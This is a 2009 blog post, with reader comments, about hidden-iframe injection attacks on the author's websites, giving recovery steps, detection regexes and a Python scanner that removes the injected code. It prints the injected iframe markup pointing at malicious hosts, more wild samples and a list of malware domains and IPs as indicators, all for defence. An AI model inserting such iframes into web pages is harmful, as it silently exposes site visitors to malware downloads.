Hidden iframe injection attacks

Mar 20 2009

[Updated on October 27, 2009 with a new version of the script]

It is a shame that after all those posts about security, some of my websites were under attack today.

Shoban and Anand emailed me about this this morning (thanks guys) and I tried to understand what was going on. To my utter disbelief, more than 10 websites hosted on the same server were affected by the attack.

All the index.* files in the server were infected with a piece of code that loaded a hidden iframe in the page.

To the html pages the following piece of code was added:

<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

To php pages it added:

echo "<iframe src=\"http://goooogleadsence.biz/?click=8F9DA\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";

Asha took the effort and cleaned most of the infected files. We are monitoring the status now.

How did the worm inject the hidden iframes to my files?

There are two ways through which the worm is believed to infect your files:

1) Server is compromised

This is the most common way. Some of the websites residing on the same web server as your website may be compromised (or it may be some vulnerability in your web application itself), which caused the web server to be compromised. Once the server is compromised, the worm will spread to all the websites on the server.

2) Client side FTP

The worm resides in some/any of the client side PCs you use for accessing the ftp/control panel accounts of your hosting server.

When you type in the username and password for the ftp/control panel account, the worm silently reads the credentials, accesses your ftp account and infects the files on the server. It adds the above-mentioned code to all index.* files.

How can I recover from a hidden iframe injection attack?

Here are a few tips that might help you:

  1. The first thing to do to prevent these kinds of attacks is to change your ftp, control panel and database passwords as soon as possible.
  2. Notify your web host about the attack and advise them to take measures against a possible server-wide attack.
  3. Change the file permissions on your server to the most secure mode.
  4. Download all your files from the server and check for infections. Clean the infected files.
  5. Using good antivirus software, scan and clean every PC you use for logging into your hosting server.
  6. Never use public computers to access your server.

How do I clean infected files?

Use these regular expressions to search for all pages containing the malicious code and replace it with a space (the first matches the html form, the second the php form; `[^"]*` stands in for the per-site URL):

<iframe src="http://[^"]*" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

echo "<iframe src=\\"http://[^"]*\\" width=1 height=1 style=\\"visibility:hidden;position:absolute\\"></iframe>";

You may have to write a script to automate this for all the files on the server.

I have cooked up a php script that can help you find out the infected files. Download the file from here, save it as clean.php (it is currently clean.php.txt) and upload it to the root folder of your website.

You may want to change some hardcoded values inside the file.

Then visit the url:

http://www.yourdomain.com/clean.php?c=iframe

The parameter c specifies the text to search for inside each file. The results will be something like:

[Screenshot: Clean hidden iframes]

It will search all the files in your website and, if any of the files contains the given string, it will print the filename along with the number of occurrences of the string. In the above screenshot, you can see that one file is infected.

Note that the script will not remove the iframes from your files. Automated cleaning could break some of your websites, so as of now you will have to clean the files manually.

Faiz has written an advanced ASP.Net script for finding the infected files, and it can be found here.

Will my search engine rankings be affected by this attack?

Try to be fast with these steps, because if a visitor sees the message “This site may harm your computer” pop up when (s)he tries to access your website/blog, (s)he may not return again. Remember that if the security of your website is compromised, it can affect the search engine rankings of the website. Besides, it may pave the way for more sophisticated attacks.

Google will mark your site in its search results with a warning: “This site may harm your computer”.

Use the following link to see what Google thinks about your website (give the url of your site instead of shopfloorbd.co.uk):

http://www.google.com/safebrowsing/diagnostic?site=http://shopfloorbd.co.uk

As mentioned above, you must remove the malware from your local machine using antivirus software. AVG sees it as “Trojan Horse Downloader” and NOD32 sees it as “JS/Kryptik.B trojan”.

Note that when visiting an infected site, some antivirus software prompts you that “Trojan Horse Downloader”, an exe file, is trying to get loaded. Once the exe infects your machine, it will infect your server too.

Here are some more code samples caught from the wild:

<iframe src="http://hostverify.net/?click=2730375" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="http://hosttracker.net/?click=32431937" width=1 height=1 style="visibility:hidden;position:absolute">

There are obfuscated versions of the attack code too:

<script>function c102916999516l4956a7e7c979e(l4956a7e7c9b86){…  etc.

Here is a list of some other websites that host malicious content:

gumblar.cn

martuz.cn

beladen.net

38zu.cn

googleanalytlcs.net

lousecn.cn

fqwerz.cn

d99q.cn

orgsite.info

94.247.2.0

94.247.2.195

http://mmsreader.com

http://google-ana1yticz.com

http://my2.mobilesect.info

http://thedeadpit.com

http://internetcountercheck.com

http://165.194.30.123

http://ruoo.info

gogo2me.net/

http://live-counter.net

http://klinoneshoes.info

protection-livescan.com/

http://webexperience13.com

http://q5x.ru

If you find these urls in any code on your website, that is a sure sign that you are infected.
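As an added example (not the clean.php from the post, and not Faiz's script), here is a scanner written against the two regular expressions from the "How do I clean infected files?" section and the host list above. It assumes you run it on a downloaded copy of the site (step 4 of the recovery tips), walks the tree, reports each file with the number of injected iframes and the number of references to known bad hosts, and can strip the iframes. The sample site it builds, the host subset, and the extension list are constructed for the demonstration; the default is a dry run, because the post warns that automated cleaning can break sites.

```python
"""Scan a web root for injected hidden iframes and known malicious hosts.

Added example, not the post's own clean.php. Assumes a local copy of the
site and the two injection forms quoted in the post (raw HTML and echo'd
PHP string). Files are handled as bytes so non-UTF-8 pages survive intact.
"""
import os
import re
import tempfile

# Regexes for the two forms quoted in the post. `[^"]*` stands in for the
# per-victim URL. In the PHP form the quotes are backslash-escaped, so the
# pattern has to match a literal backslash before each quote.
HTML_IFRAME_RE = re.compile(
    rb'<iframe src="http://[^"]*" width=1 height=1 '
    rb'style="visibility:hidden;position:absolute"></iframe>'
)
PHP_IFRAME_RE = re.compile(
    rb'echo "<iframe src=\\"http://[^"]*\\" width=1 height=1 '
    rb'style=\\"visibility:hidden;position:absolute\\"></iframe>";'
)

# Subset of the hosts named in the post (the injected URLs and the IoC list).
MALICIOUS_HOSTS = (
    "goooogleadsence.biz", "hostverify.net", "hosttracker.net",
    "gumblar.cn", "martuz.cn", "beladen.net", "googleanalytlcs.net",
    "google-ana1yticz.com", "94.247.2.195",
)
HOST_RE = re.compile(b"|".join(re.escape(h.encode()) for h in MALICIOUS_HOSTS))

# Extensions worth scanning; .css is included to show that the specific
# regexes do not flag ordinary 'iframe' CSS rules the way a bare string search does.
SCAN_EXTENSIONS = (".html", ".htm", ".php", ".js", ".css")


def scan_file(path):
    """Return (iframe_hits, host_hits) for one file; (0, 0) if unreadable."""
    try:
        with open(path, "rb") as fh:
            data = fh.read()
    except OSError:
        return 0, 0
    iframes = len(HTML_IFRAME_RE.findall(data)) + len(PHP_IFRAME_RE.findall(data))
    return iframes, len(HOST_RE.findall(data))


def scan_tree(root, extensions=SCAN_EXTENSIONS):
    """Walk root; return {relative_path: (iframe_hits, host_hits)} for files with hits."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if not name.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, name)
            iframes, hosts = scan_file(path)
            if iframes or hosts:
                report[os.path.relpath(path, root)] = (iframes, hosts)
    return report


def clean_file(path, apply=False):
    """Strip the injected iframe (both forms) from one file; return the count removed.

    Dry run unless apply=True; when writing, the original is kept as path + '.bak'
    so the cleaned page can be diffed before it is uploaded again.
    """
    with open(path, "rb") as fh:
        data = fh.read()
    cleaned, n_html = HTML_IFRAME_RE.subn(b"", data)
    cleaned, n_php = PHP_IFRAME_RE.subn(b"", cleaned)
    removed = n_html + n_php
    if apply and removed:
        with open(path + ".bak", "wb") as fh:
            fh.write(data)
        with open(path, "wb") as fh:
            fh.write(cleaned)
    return removed


def build_sample_site():
    """Write a constructed sample site to a temp dir and return its root.

    Contains one infected index.html, one infected index.php, a clean page, and
    a CSS file with an 'iframe' rule (the kind of false positive a bare string
    search reports).
    """
    root = tempfile.mkdtemp(prefix="iframe-scan-")
    samples = {
        "index.html": b"<html><body>Hello</body></html>\n"
        b'<iframe src="http://goooogleadsence.biz/?click=8F9DA" width=1 height=1 '
        b'style="visibility:hidden;position:absolute"></iframe>\n',
        "blog/index.php": b"<?php\necho 'site';\n"
        b'echo "<iframe src=\\"http://hostverify.net/?click=2730375\\" width=1 height=1 '
        b'style=\\"visibility:hidden;position:absolute\\"></iframe>";\n',
        "css/style.css": b"iframe { border: 0; }\n",
        "about.html": b"<html><body>About us</body></html>\n",
    }
    for rel, content in samples.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    site = build_sample_site()
    for rel, (iframes, hosts) in sorted(scan_tree(site).items()):
        print(f"{rel}: {iframes} injected iframe(s), {hosts} known bad host(s)")
```

Point `scan_tree` at the downloaded site root to get the same file-and-count listing the post's script produces, but keyed to the exact injected markup rather than the word "iframe", so CSS rules and legitimate embeds are not reported. Treat a host hit without an iframe hit as something to inspect by hand: it usually means the obfuscated script variant mentioned above, which these two regexes do not cover.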

100 responses so far

  • Redant32ltd says:

    I would like to say THANK YOU! Your write-up is very helpful. Now I know why and where we get that malware. Maybe our web server is compromised, but they are denying it.

    Thanks for your help and God Bless you.

  • Anish says:

    Big twing. My personal web https://www.anishk.in got affected recently :(
    Trying to remove it. Thanks for the post. Will try out the steps :-s

  • Jane says:

    Put the code into a page clean.php just like you said, put it in the root directory and when I put http://www.mydomain.com/clean.php?c=iframe into the browser all I get is your code. Then put it in the public.html and same thing.

    I’m getting an attack page on my blog’s home page. Tried also a search for just <iframe src= and it came out blank. Nothing found. :-(

  • Afrim says:

    Hello, I recently found that my WordPress blog is under malware attacks. Actually it says it is infected, and I noticed from earlier that when I opened the site I saw almost every time one suspicious link loading something like smuus.net… ?

    And I did scan with one website scanner and it found that one plugin file is infected with some hidden iframes which redirect to the site that I wrote up there, smuus.net/redirect.php

    I opened those javascript files in a text editor but I can't find them. I used your script to find the smuus text; it doesn't show any result. I searched for iframe; it has a lot, but almost all are CSS files. CSS styles for iframe tags.

    There is the website scanner report:
    http://sitecheck.sucuri.net/results/shqipe.tk

    If you can help me it would be very generous from you.

  • Darius says:

    Hello,

    I cleaned up using your tool and now my website is not working anymore. It displays just a “0”. :( Is there a way to fix my website?
    http://www.pipinga.com

    Thanks
    Darius

  • Jeff says:

    This really doesn’t make sense. I mean, thanks for the script, but you really don’t go into full detail after much.

    Example:
    ===================================================================
    How do I clean infected files?
    Use these regular expressions to search for all pages containing the malicious code and replace it with space:

    echo \”\”;

    You may have to write a script to automate this for all the files in the server.
    ===================================================================

    You don’t really tell us where to put this now. What line on what file. Nothing.

  • Jeff says:

    Not to mention it finds a false positive on every single file in every directory of a WordPress install.

  • becka says:

    I believe my computer was injected with this worm, however I am unable to get past the LOG IN screen to my desktop…. any suggestions?? thanks

    please email swamppudding@gmx.com

  • Eduardo says:

    Thanks so much for the script… it was very helpful. I found the malware and replaced “iframe” for the bad link in malware script…

    Got listed all the files which were hundreds of them. Site is clean right now thanks to you.

  • ralph says:

    Hi there

    I have the same problem. My Joomla sites have been hacked, and in all folders and subfolders where an index.html or index.php file is, a line Iframe ….. was entered.

    My problem is now that I can't even download the files from the ftp server because my virus software will not allow that. It deletes them automatically. How can I download them without having trouble? With, for example, Sandboxie it didn't work.

    Thanks for any comment.

    ralph

  • [...] those unfamiliar with iframe attacks, they can only happen by accessing the physical files of the website. This can be accomplished through acquiring login credentials to the web server, [...]



  • These website injections are very popular nowadays; spyware and worms attack many websites. How can we be safe from these iframe or injection attacks? Don't delete any files from the server; just ask the hosting authorities and say please run antivirus on our hosting plan, and these files will be cleaned after a virus cleaner. Our dedicated server is also infected with these worms, but I cleaned the virus, and you can change your password after the month. Lots of nulled scripts are very helpful in spreading these types of infections.
